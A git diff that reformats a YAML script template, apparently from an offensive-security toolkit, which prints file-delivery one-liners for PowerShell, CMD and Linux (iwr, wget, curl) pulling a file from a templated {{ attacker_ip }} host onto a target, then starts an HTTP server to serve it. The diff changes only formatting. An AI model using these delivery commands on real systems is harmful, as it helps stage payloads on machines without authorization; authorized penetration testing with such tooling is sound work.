--- a/src/profi/templates/scripts/deliver-universal-transfer-outbound.yaml
+++ b/src/profi/templates/scripts/deliver-universal-transfer-outbound.yaml
@@ -1,18 +1,20 @@
+---
 metadata:
-  filename: deliver-universal-transfer-outbound.yaml
-  tags:
-  - web
-  created: '2025-03-29'
-  author: Unknown
-content: "mkdir -p packstation/outbound; \\\necho '================================================================';\
-  \ \\\necho '                      -----PowerShell-----                      '; \\\
-  \necho 'Deliver: iwr -uri http://{{ attacker_ip }}:{{ delivery_outbound_port }}/FILE\
-  \ -Outfile {{ delivery_path_windows }}\\FILE'; \\\necho '================================================================';\
-  \ \\\necho '                         -----CMD-----                          '; \\\
-  \necho 'Deliver: powershell wget -uri http://{{ attacker_ip }}:{{ delivery_outbound_port\
-  \ }}/FILE -Outfile {{ delivery_path_windows }}\\FILE'; \\\necho '================================================================';\
-  \ \\\necho '                       -----Linux------                         '; \\\
-  \necho 'Deliver: curl http://{{ attacker_ip }}:{{ delivery_outbound_port }}/FILE\
-  \ -o {{ delivery_path_linux }}/FILE'; \\\necho '================================================================';\
-  \ \\\n python {{ templates_dir }}/helper_scripts/startEnhancedHttpServer.py -p {{\
-  \ delivery_outbound_port }} -d packstation/outbound\n"
+  filename: "deliver-universal-transfer-outbound.yaml"
+  tags: ["web"]
+  created: "2025-03-29"
+  author: "Unknown"
+
+content: |
+  mkdir -p packstation/outbound; \
+  echo '================================================================'; \
+  echo '                      -----PowerShell-----                      '; \
+  echo 'Deliver: iwr -uri http://{{ attacker_ip }}:{{ delivery_outbound_port }}/FILE -Outfile {{ delivery_path_windows }}\FILE'; \
+  echo '================================================================'; \
+  echo '                         -----CMD-----                          '; \
+  echo 'Deliver: powershell wget -uri http://{{ attacker_ip }}:{{ delivery_outbound_port }}/FILE -Outfile {{ delivery_path_windows }}\FILE'; \
+  echo '================================================================'; \
+  echo '                       -----Linux------                         '; \
+  echo 'Deliver: curl http://{{ attacker_ip }}:{{ delivery_outbound_port }}/FILE -o {{ delivery_path_linux }}/FILE'; \
+  echo '================================================================'; \
+  python {{ templates_dir }}/helper_scripts/startEnhancedHttpServer.py -p {{ delivery_outbound_port }} -d packstation/outbound
